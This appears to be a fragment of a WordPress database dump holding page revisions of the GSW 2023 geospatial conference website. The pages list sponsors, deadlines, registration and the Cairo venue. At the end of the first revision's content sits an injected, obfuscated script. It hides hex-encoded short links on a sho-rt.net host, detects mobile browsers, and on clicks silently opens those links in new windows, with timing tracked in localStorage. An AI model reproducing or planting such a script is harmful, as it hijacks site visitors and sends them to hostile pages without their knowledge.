link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:29:26','2023-05-17 04:29:26','',3066,'https://gsw2023.com/?p=4512',0,'revision','',0),
(4513,1,'2023-05-17 04:32:36','2023-05-17 04:32:36','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button 